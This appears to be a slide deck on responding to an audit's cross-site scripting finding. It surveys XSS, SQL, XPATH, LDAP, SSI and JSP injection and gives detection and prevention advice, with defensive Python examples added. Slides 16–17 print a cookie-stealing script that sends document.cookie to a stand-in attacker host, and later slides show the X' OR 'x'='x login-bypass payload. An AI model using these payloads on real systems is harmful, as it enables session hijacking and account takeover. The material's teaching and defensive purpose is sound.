Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

1 Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz

2 Business Problem
- Independent security audit
- Regulatory compliance
- XSS issue raised
- Must provide a response

3 Audit Response
- Either:
  – Prove the issue to be a non-problem, or
  – Describe actions to take

4

5 Resolution Steps
- Investigate security concerns
- Restate as IT problem(s)
- Determine solution(s)
- Provide audit response
- Mitigate risk

6 Investigation
- Define cross-site scripting (XSS)
- Examine how the auditors applied it
- Identify risks
- Research preliminary solutions

7 Cross-site scripting
- Attacker goal: get their code into the victim's browser
- XSS forces a website to execute malicious code in the browser
- The browser user is the intended victim
- Why? Account hijacking, keystroke recording, intranet hacking, theft…

8 XSS concept

9 Auditor finding
- Freeform edit box
- Message to Customer Service

10 XSS types
- Immediate reflection: phishing
- DOM-based: 95 JavaScript methods
- Redirection: header, meta, dynamic
- Multimedia: Flash, QT, PDF scripts
- Cross-Site Request Forgery (CSRF)
- Others…
  – (e.g. non-persistent search box)

11 Risks
- XSS abuses render engines or plug-ins
- Steal browser cookies
- Steal session info for a replay attack
- Malware or bot installation
- Redirect or phishing attempt

12 Our actual risk
- Currently, none.
- Edit box info is viewed in a thick client
- DHTML or JavaScript needs a browser
- Our thick client is Java Swing-based

13 Planned Audit Response
- Could indicate "no audit problem"
- Might have future impact
- Address through dev standards
- Consider an application firewall
- Widen the problem scope to include all user agent injection tactics

14 More on Web Attacks
- Cross Site Scripting
- SQL Injection
- XPATH Injection
- LDAP Injection
- SSI (Server Side Include) Injection
- JSP (Java Server Pages) Injection

15 Artifacts
- For each injection issue:
  – Vulnerability description documented
  – Preventative coding technique
- Discuss with App Dev teams
  – Publish and socialize direction
  – Include in peer reviews/code walkthroughs
  – Set deadlines for full incorporation
- Communicate with auditors

16 Cross Site Scripting Example 1
- Trudy posts the following JavaScript on a message board:
  document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie
- When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

17 Cross Site Scripting Example 2
- Trudy sends Bob a link to the following URL, which will take him to a personalized page:
  http://host/personalizedpage.php?username=document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie
- A page is returned that contains the malicious script instead of the username Bob, and Bob's browser executes the script, causing his session cookie to be sent to Trudy
- Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

18 Cross Site Scripting Detection
- A client usually is not supposed to send scripts to servers
  – If the server receives … or the hex equivalent in an incoming packet, and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred
- A sanitized script could look like &lt;SCRIPT>…
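The two checks on this slide (ingress: does a client value carry script, including the percent-encoded form from slide 17; egress: does that value reappear unencoded in the response) and the output encoding that produces the "&lt;SCRIPT>" form can be written in a few lines. This is an added example, not code from the deck; the sample payload text mirrors Example 1, and `render_profile` is a hypothetical stand-in for the personalized page of Example 2.

```python
import html
import re
from urllib.parse import quote, unquote

# Constructed sample inputs for this example. The payload text mirrors the deck's
# Example 1; HEX_PAYLOAD is the same string percent-encoded, as slide 17 describes.
SCRIPT_PAYLOAD = ("<script>document.location='http://trudyhost/cgi-bin/"
                  "stealcookie.cgi?'+document.cookie</script>")
HEX_PAYLOAD = quote(SCRIPT_PAYLOAD, safe="")   # %3Cscript%3Edocument.location%3D...
BENIGN_INPUT = "Bob"

# Indicators that a client is sending script to the server (slide 18's premise).
_SCRIPT_RE = re.compile(r"<\s*script\b|javascript\s*:", re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding a bounded number of times so that single- and
    double-encoded input is compared in the form the browser would see."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_script(value: str) -> bool:
    """Ingress check: does this form field or query value carry script?"""
    return bool(_SCRIPT_RE.search(normalize(value)))


def sanitize_for_html(value: str) -> str:
    """Output encoding: <, >, &, and quotes become entities, so the browser
    renders text instead of executing markup (the deck's '&lt;SCRIPT>' form,
    with > and quotes encoded as well)."""
    return html.escape(value, quote=True)


def echoed_unsanitized(inbound: str, outbound: str) -> bool:
    """Egress correlation: the script received from the client reappears
    verbatim in the response, i.e. it was reflected without encoding."""
    return normalize(inbound) in outbound


def render_profile(username: str) -> str:
    """Hypothetical personalized page (the scenario of slide 17), built safely."""
    return "<p>Welcome, " + sanitize_for_html(username) + "</p>"
```

`normalize` is bounded on purpose: decoding until a fixed point is reached avoids an unbounded loop on pathological input while still catching `%253C`-style double encoding. The egress check is the deck's rule applied literally: it only says something once the inbound value is known, which is why the ingress log and the outbound comparison belong together.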

19 SQL Injection Example
- Trudy accesses Bob's website, in which he does not validate input on his sign-in form
  – It runs a SQL statement like the following:
  – SELECT * from Accounts where username = "USER_NAME" and password = "USER_PASS";
- In the password field, she types as her password:
  – X" OR "x"="x
- This manipulates the server into running the following SQL command:
  – SELECT * from Accounts where username = "USER_NAME" and password="X" OR "x"="x";
  – Selects all account information

20 SQL Injection Detection
- To detect and prevent this at Bob's location:
  – Log any traffic from Trudy to Bob containing form data that contains a quotation mark
  – Match any outgoing SQL statements from Bob's web server to his database server and verify that the quotation marks Trudy supplied were escaped
  – If they weren't, take action
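The coding-side fix the deck's "preventative coding technique" artifact calls for is to stop pasting user text into the statement at all. The added example below (not from the deck) runs slide 19's sign-in query against a constructed in-memory SQLite table twice: once built by string concatenation, once with driver placeholders. SQLite string literals use single quotes, so the slide's payload is written here as `X' OR 'x'='x`; the sample accounts are invented.

```python
import sqlite3

# Constructed sample data for this example.
SAMPLE_ACCOUNTS = [("bob", "s3cret", 100), ("alice", "hunter2", 250)]
# Slide 19's password, with single quotes because that is SQLite's literal delimiter.
PAYLOAD = "X' OR 'x'='x"


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database holding the constructed Accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts (username TEXT, password TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO Accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Slide 19's pattern: the user's text becomes part of the SQL text, so a
    quote in the password closes the literal and the OR clause is honoured."""
    sql = ("SELECT * FROM Accounts WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Fix: placeholders. The driver ships the values separately from the SQL
    text, so the password is compared as one opaque string, quotes and all."""
    sql = "SELECT * FROM Accounts WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", login_vulnerable(db, "bob", PAYLOAD))     # every row
    print("parameterized:", login_parameterized(db, "bob", PAYLOAD))  # no rows
```

The parameterized form is what the deck's "input validation coding" standard should mandate; the quotation-mark logging on this slide then becomes a detective control for code that has not yet been converted.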

21 XPATH Injection Example
- Similar to SQL injection
- Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:
  – string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())
- Trudy again can provide the following password to change the statement's logic:
  – X' OR 'x'='x
  – The statement thus selects the first account

22 LDAP Injection Example
- Server using LDAP for authentication
  – User name initialized, but then uses unchecked user input to create a query:
  filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
- Attacker can exploit using special characters:
  http://example/ldapsearch.asp?user=*

23 LDAP Injection Detection
- Detection is based on the usage of special LDAP characters
  – System monitors input for special characters
  – Either scrubs incoming input or watches for unescaped output passed to the database server
- Detection approach is black-box
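Slides 22 and 23 together describe the special-character problem and its two answers: scrub on ingress, or watch egress for the raw characters. The added example below (not from the deck) implements both in Python plus the safe way to build the `(uid=...)` filter from slide 22, using the RFC 4515 rule that `*`, `(`, `)`, `\` and NUL inside a filter value are written as `\XX` hex escapes. The inputs are constructed.

```python
# RFC 4515: characters with meaning inside a search filter are replaced by
# backslash-hex escapes so the directory server matches them literally.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}
_LDAP_SPECIAL = frozenset(_LDAP_FILTER_ESCAPES)


def escape_ldap_filter_value(value: str) -> str:
    """Escape one character at a time, so the backslash introduced by an
    escape is never escaped a second time."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_uid_filter(user_name: str) -> str:
    """Safe counterpart of the deck's  filter = "(uid=" + CStr(userName) + ")"  line."""
    return "(uid=" + escape_ldap_filter_value(user_name) + ")"


def has_ldap_special_chars(value: str) -> bool:
    """Ingress check (slide 23): does the submitted value carry filter metacharacters?"""
    return any(ch in _LDAP_SPECIAL for ch in value)


def unescaped_in_filter(value: str, outbound_filter: str) -> bool:
    """Egress check (slide 23): a value that carried metacharacters appears
    verbatim, i.e. unescaped, in the filter sent to the directory."""
    return has_ldap_special_chars(value) and value in outbound_filter


if __name__ == "__main__":
    # Constructed sample: the slide's  ?user=*  query parameter.
    submitted = "*"
    print("flagged on ingress:", has_ldap_special_chars(submitted))      # True
    print("naive filter:", "(uid=" + submitted + ")")                    # (uid=*)
    print("escaped filter:", build_uid_filter(submitted))                # (uid=\2a)
```

Because a user's legitimate identifier can contain a backslash or parenthesis, the ingress flag is better treated as a log-and-escape signal than as a hard reject; the escaped filter is the one that is safe to send either way.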

24 SSI Injection Example
- Bob has his server configured to use Server-Side Includes
- Trudy passes input with an SSI directive embedded
- The SSI inserts malicious code into normal web pages upon the next request
- Future legitimate users get content containing the tainted code included by the SSI

25 SSI Injection Detection
- Bob's system needs SSI enabled, so he uses our system on local servers
  – SSI code can be detected by its specific format: an HTML comment ( ) containing a command
  – SSI commands can be stripped on ingress
  – Can also deny outgoing packets that do not include the SSI as it was input (which means it executed successfully)
- Detection approach is black-box
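The three rules on this slide (recognize the directive by its comment format, strip it on ingress, and treat its absence from the response as evidence that the server executed it) fit one small module. This is an added example, not the deck's system; it assumes the Apache-style directive syntax `<!--#command ... -->`, and the submissions and responses it checks are constructed, using the harmless `echo` directive rather than any command that runs a program.

```python
import re

# Apache-style SSI directive: an HTML comment whose body starts with '#command'.
# A plain comment (<!-- note -->) does not match because the '#' is required.
_SSI_DIRECTIVE_RE = re.compile(r"<!--\s*#\s*([A-Za-z]+)\b.*?-->", re.DOTALL)

# Constructed sample submissions for this example.
SUBMISSION_WITH_SSI = 'Hello <!--#echo var="DATE_LOCAL" --> world'
SUBMISSION_BENIGN = "Hello <!-- just a note --> world"


def find_ssi_directives(text: str) -> list:
    """Ingress detection: names of the SSI commands embedded in the text."""
    return [m.group(1).lower() for m in _SSI_DIRECTIVE_RE.finditer(text)]


def strip_ssi_directives(text: str) -> str:
    """Ingress scrubbing: remove every directive, keeping ordinary comments."""
    return _SSI_DIRECTIVE_RE.sub("", text)


def ssi_executed(inbound: str, outbound: str) -> bool:
    """Egress rule from slide 25: a directive that was submitted but no longer
    appears verbatim in the response was most likely expanded by the server."""
    return any(m.group(0) not in outbound for m in _SSI_DIRECTIVE_RE.finditer(inbound))


if __name__ == "__main__":
    print(find_ssi_directives(SUBMISSION_WITH_SSI))           # ['echo']
    print(strip_ssi_directives(SUBMISSION_WITH_SSI))          # 'Hello  world'
    print(ssi_executed(SUBMISSION_WITH_SSI, "Hello Tuesday world"))  # True
```

The egress check is deliberately conservative: if the directive text comes back unchanged (for instance because the page HTML-encoded it), the server did not expand it and nothing is flagged.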

26 JSP Injection Example
- Similar to SSI injection
- Bob has a portal server configured to use dynamic code for templates
- Trudy passes input with an embedded
- Malicious code inserted into the web page

27 JSP Injection Prevention
- Prefer static include
- Don't allow file inclusion outside of the server via Java 2 Security policies
- Firewall rules to prevent outbound requests from the server
- Input validation coding
- Choose portal software not requiring dynamic includes or code execution

28 Defense Approaches
- Web firewall/IDS
  – ModSecurity for Apache
  – Commercial: SecureSphere from Imperva
- Static code analysis
  – Open source: Nikto
  – Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
- Education on good coding
  – HTML encoding on input (server-side)
  – Input validation/filtering

29 Q&A
- Suggestions?

30

31 Backup Slides

32 User agent injection
- Stored
- HTTP Response Splitting
- SQL Injection
- XML Injection
- JSP Code Injection
- LDAP Injection

33 Approaches
- Application firewall
- HTML encoding on input (server-side)
- Input validation/filtering
- Coding techniques with output
- Session key enforced to prevent CSRF

34 XPATH Injection Detection
- Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries
- Correction can again be done by escaping any rogue quotation marks Trudy may have inserted
- Detection approach is black-box
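Slides 20 and 34 describe the same black-box correlation for SQL and XPATH: keep the submitted fields that contain a quotation mark, and flag any whose text reappears verbatim in the outbound statement. The added example below (not the deck's system) implements that audit and the "correction by escaping" step for both query languages. For SQL the standard literal escape is doubling the single quote; XPath 1.0 has no escape character inside a literal, so the safe form used here is the well-known `concat()` construction that puts each quote in its own double-quoted piece. The form submission and queries are constructed from slides 19 and 21.

```python
# Constructed sample submission: slide 21's username and Trudy's password.
PAYLOAD = "X' OR 'x'='x"
SAMPLE_FORM = {"username": "bob", "password": PAYLOAD}

# Slide 21's query, built the vulnerable way (string concatenation).
VULNERABLE_XPATH = ("string(//user[name/text()='bob' and password/text()='"
                    + PAYLOAD + "']/account/text())")


def fields_with_quotes(form: dict) -> dict:
    """Ingress logging rule (slides 20 and 34): fields carrying ' or "."""
    return {k: v for k, v in form.items() if "'" in v or '"' in v}


def audit(form: dict, outbound_query: str) -> list:
    """Egress correlation: names of quoted fields that appear verbatim, i.e.
    unescaped, in the statement sent to the database or XML store."""
    return sorted(k for k, v in fields_with_quotes(form).items() if v in outbound_query)


def sql_literal(value: str) -> str:
    """SQL correction: double every single quote and wrap in single quotes."""
    return "'" + value.replace("'", "''") + "'"


def xpath_literal(value: str) -> str:
    """XPath 1.0 correction: a value without ' is a plain literal; otherwise
    split on ' and rejoin with concat(), each quote as its own "'" piece."""
    if "'" not in value:
        return "'" + value + "'"
    parts = ["'" + p + "'" for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def build_xpath_query(user_name: str, password: str) -> str:
    """Slide 21's query built with escaped literals instead of concatenation."""
    return ("string(//user[name/text()=" + xpath_literal(user_name)
            + " and password/text()=" + xpath_literal(password) + "]/account/text())")


def build_sql_query(user_name: str, password: str) -> str:
    """Slide 19's query built with escaped literals (single-quoted SQL strings)."""
    return ("SELECT * FROM Accounts WHERE username = " + sql_literal(user_name)
            + " AND password = " + sql_literal(password))


if __name__ == "__main__":
    print("vulnerable:", audit(SAMPLE_FORM, VULNERABLE_XPATH))                   # ['password']
    print("escaped:   ", audit(SAMPLE_FORM, build_xpath_query("bob", PAYLOAD)))  # []
    print(build_xpath_query("bob", PAYLOAD))
```

Escaping keeps the page's detection rule meaningful: once the quotes are neutralized the raw submission no longer occurs as a substring of the outbound statement, so the audit stays quiet. Where the query API offers parameters (as SQL drivers do), those are still preferable to hand-built literals.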
